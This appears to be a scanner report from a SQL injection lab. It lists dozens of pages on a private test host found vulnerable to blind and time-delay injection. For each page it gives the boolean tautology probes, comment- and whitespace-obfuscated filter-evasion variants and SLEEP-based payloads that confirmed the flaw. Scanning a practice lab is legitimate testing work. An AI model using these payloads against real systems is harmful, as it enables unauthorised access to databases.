Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	39552=39552
	and	8329=8329
	or	69328=69328#
	and	65354=65355
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	39552=39552
	and	8329=8329
	or	69328=69328#
	and	65354=65355
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	39552=39552
	and	8329=8329
	or	69328=69328#
	and	65354=65355
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'92914'='92914
'/**/and/**/'3619'='3619
'/**/or/**/17411=17411#
'/**/and/**/'12702'='12703
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
65952=65952

and
2056=2056

or
93527=93527#

and
28913=28914
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'76408'='76408
'+and+'76997'='76997
'+or+67679=67679#
'+and+'72995'='72996
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example115.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example116.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example117.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example119.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example118.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example121.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example120.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example123.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example122.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example124.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example126.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example125.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example127.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example128.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example129.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example130.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example131.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example132.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example134.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example133.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example135.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example138.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example136.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example137.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example139.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example140.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example141.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'19684'='19684
'	and	'53673'='53673
'	or	31177=31177#
'	and	'97996'='97997
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---